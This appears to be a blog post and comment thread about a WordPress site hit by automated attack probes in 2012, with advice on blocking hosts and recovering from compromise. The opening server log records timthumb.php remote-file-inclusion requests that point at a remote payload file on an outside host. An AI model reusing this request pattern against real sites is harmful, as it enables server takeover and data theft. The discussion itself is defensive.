188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:44], “GET, rankexploits.com, //wp-content/plugins/cms-pack/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:45], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:45], “GET, rankexploits.com, //wp-content/plugins/cms-pack/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:45], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:45], “GET, rankexploits.com, //wp-content/plugins/cms-pack/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:45], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:45], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:45], “GET, rankexploits.com, //wp-content/plugins/cms-pack/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:46], “GET, rankexploits.com, //wp-content/plugins/cms-pack/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:47], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:47], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:47], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:49], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:50], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
That only ended when I banned it.
Luckily, I can eliminate part of the wasted energy by blocking IP 188.165.198.194.
Mind you: I’m not sure IP 188.165.198.194 really comes from Gigablast. Gigablast is registered in New Mexico. IP 188.165.198.194 resolves to France Paris Ovh Systems. If I searched further I might discover this is a nuclear powered cracker bot; that might account for the non-stop nature of the barrage!
If you are French (and not at IP 188.165.198.194 or any of the other Paris Ovh system IPs I’ve banned), I’d be curious to know something about “France Paris Ovh Systems”. Are they just a huge service provider? If so, the amount of spam from these guys might just arise because of a small fraction of bad customers. Alternatively, if they are a small company, I’m tempted to just ban all of “France Paris Ovh Systems”.
Are you not tempted to have a go at banning ‘The French’ and be done with it?
I should add (hurriedly) that I’m a Francophile with a property in Normandy, but the ‘Entente Cordiale’ surely has its limits 🙂
ROFL. Sheer brilliance Lucia.
If “90% of its power usage comes from wind energy” it’s probably down most of the time.
And, as a service to civilisation, instead of banning ‘all of “France Paris Ovh Systems” couldn’t you ban all of France period?
I like France!
But I see lots of crackerbots from that ISP. It doesn’t seem to have gotten itself on Zaphod’s list of bad hosts yet though. (Zaphod is the author of ZBblock. He’s got whole ranges in Mexico, Thailand, China etc. banned. But some of these are so bad I’d rather ban before they even hit my server!
Gosh–What’s with all this anti-French sentiment? There are two countries moderated:
Israel– because they have rampant image scrapers one of which is the company that provides Getty Images stuff. And I’ve got a grudge now.
China– because. Oh… just because!!!
People from these countries are presented a captcha and can send me a message. The only one from Israel who did is hosted at precisely the company that spammed my blog and brought it to it’s knees. Then, one of my readers told me about Cloudflare. As soon as I set up a site, I moderated Israel! (Plus, everything from the host Bezeq in Israel is banned.)
When I cool down, I’ll have to unmoderate Israel….. (Or if someone sends me a note, tells me who they are and let’s me make sure they aren’t just some tool sent by Bezeq!)
BTW: The user agents left by spam are getting amusing. Someone supposedly hit the blog using Windows 3.1. How old is that?
Someone hit with “compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor”. Weird…
These hit uri’s that don’t exist and left non-existent uri’s as referrers. (The URI’s weren’t nasty; they just don’t exist.)
OVH are a huge hosting company – they host something like 60,000 dedicated servers.
If you e-mail the IP address and details of the spam to abuse@ovh.net they’ll shut the server down.
Gareth–
Thanks. I could email abuse departments and sometimes do. The only difficulties are that I would be emailing 4 abuse letters a day — which is time consuming and quite a few systems list an abuse department that really does nothing.
At a certain point, if a host emits lots of spam, the person on the receiving end has to decide if it’s more time efficient to just ban a system or try to put together information to convince an abuse department that the stuff is, indeed, abuse. I’ll write OVH on this but I’ve discovered info that makes suggests they might not ban.
It turns out I was wrong about the OVH not having garnered the hatred of Zaphod who writes and distributes ZBblock. One of their servers has garnered Zaphod’s hatred. OVH IP 188.165.198.194 is s “ks380181.kimsufi.com” and ZBblock bounces everything from “kimsufi.com”. But nearby 188.165.246.91 is also OVH is also “France Paris Ovh Systems ” but on “ns3.sensomedia.com”. So, while “sensomedia.com” doesn’t get bounced OVH seems to be permitted a server to develop a reputation as a spam forum host. If Zaphod put them on the list, t his has been going on a while, it’s likely that lots of complaints have gone to the abuse department and nothing has been done.
Some companies make too much money renting spammers space!
To those wondering how I logged these if I use ZBblock with WordPress and ZBblock bounces them: I’ve adjusted apache to shunt all ‘wrong’ requests for anything in ‘/wp-content/plugins/’ to hard 404’s instead of going through WP’s “nice” 404 page. I log and then pipe the request through ZBblock afterwards. ZBblock treats them in the manner Zaphod intends. In this case, ZBblock gave the “scary” 403 for multiple issues which included Zaphod’s block for “kimsufi” . If I get enough from “sensomedia.com”, I’ll hard code that into my ZBblock files.
(I’ll also email abuse, but as I wrote, I’m not very hopeful.)
lucia, you say:
The last sentence is a massive understatement. I only spent a few minutes looking at what that was trying to do, but already, I can tell it’s “evil.” The impression I get is it would give them complete control of your server. They’d download every file on it and copy everything from your database. They’d then give themselves access to a variety of services on your blog, ranging from file storage, IRC channels, mail spamming and various other nasty stuff (though there doesn’t appear to be anything for using it in a DDOS attack). Even worse, I believe all of it would be done without (necessarily) altering anything which would affect your site’s appearance or functionality, meaning they’d have complete control even as your site keeps running.
I didn’t spend a lot of time looking into it (there’s a lot involved), so my impression could be off, but it definitely is worse than just trying to inject ads into blogs.
lucia, a comment of mine landing in moderation, presumably because I quoted you using a “bad” word. That amuses me.
Brandon,
Yes, I can post “viagra”. You can’t. 🙂
I’m getting a lot of that. I know some visitors have wondered why I am diverted by dealing with this, but I knew it was really, really bad. It’s also rampant.
Remember New Years Even when I wrote you a question and you said it’s a bad sign when someone is doing this new years eve? Well… things were getting increasingly bad. With your help, I modified the redirects in .htaccess so nearly all dangerous bad requests now go to a file called “404.php”. They are logged.
Based on the logging, I’m
a) banning things at cloudfront.
b) writing new custom signatures that all WordPress bloggers should use along with ZBblock. I’ll be advising people to use them.
Uhmm… I may be needing someone who knows how to advise someone who may have been hacked. (Not me…. I don’t think I got hacked.) But instructions on how non-sophisticates can scane would be useful. There are going to be lots out there because while I didn’t have “timthumb.php” on my blog, lots of people did. Many still do. That’s one of the things these guys are hunting for. When it’s there, they will find it.
They then turn systems into zombie bots who propagate the havoc.
lucia:
Censorship I say!
It sounds like it must have been quite bad to make you work on it on the holidays. I’m glad I was able to help, though it seems strange your site is getting hit that much.
Truth be told, if you don’t know what you’re doing, you can’t hope to tell if you’ve been hacked. There are some things you can do, like looking for specific files commonly uploaded by people exploiting that vulnerability and checking to see if your timthumb.php file is up-to-date, but it won’t mean a lot.
A good hacker won’t be caught by things like that. He could easily exploit a vulnerability to give himself full control of your server then update it so it couldn’t be done again. This prevents someone else from stealing the server from him, and it makes it harder to detect what he’s done. In the same way, a hacker could use his access to change your MySQL password, but a good one won’t. He won’t want to tip you off. Instead, he’ll let you keep using it like normal and just steal whatever information he wants.
What you have to realize is a vulnerability like the timthumb.php vulnerability gives the person full control of your server. That’s literally full control. This means he can modify any file on it however he wants (that includes things like .htaccess files). Unless you can examine everything on your server and know it hasn’t been altered, you can’t be sure you haven’t been hacked.
If you’re truly worried you may have been hacked and you aren’t particularly knowledgeable, your only real option is to reinstall. Wipe out everything on the server and start over. You don’t need to recreate your database (since tables can’t store executable code), but you should at least change its password. Do that and get a clean install of WordPress, and you should be fine. Afterward, you can restore files from a backup you’ve created (either in the past, or immediately before wiping the server) as long as you’re sure they haven’t been altered. Otherwise, you should get clean copies of them too. Once you’re finished with that, you should do whatever normal security things you’d do when setting up your blog (like making sure permissions on files are right, etc).
If you really don’t want to reinstall, there are a number of options available. Offhand, I’d say you should search for the files commonly created or altered by people exploiting this vulnerability. If it’s one created by them, delete it. Otherwise, it needs to be checked for changes, or just replaced. Also, you should search files for any instances of “base64” (it has some legitimate reasons for being in files, but it’s usually used to create a “backdoor” into the server). That can most easily be done with grep through the command line, but you should be able to write a PHP script to do it.
I’m sure there’s a lot more you can do, but this is long enough already.
Oh yeah, I forgot to mention one really obvious thing. If someone is worried about their blog, it’s easy to find a scanner to check if they need to update their timthumb.php file. A quick search with Google is all you need.
It won’t tell you if someone’s broken into a server, but it is still good information to have.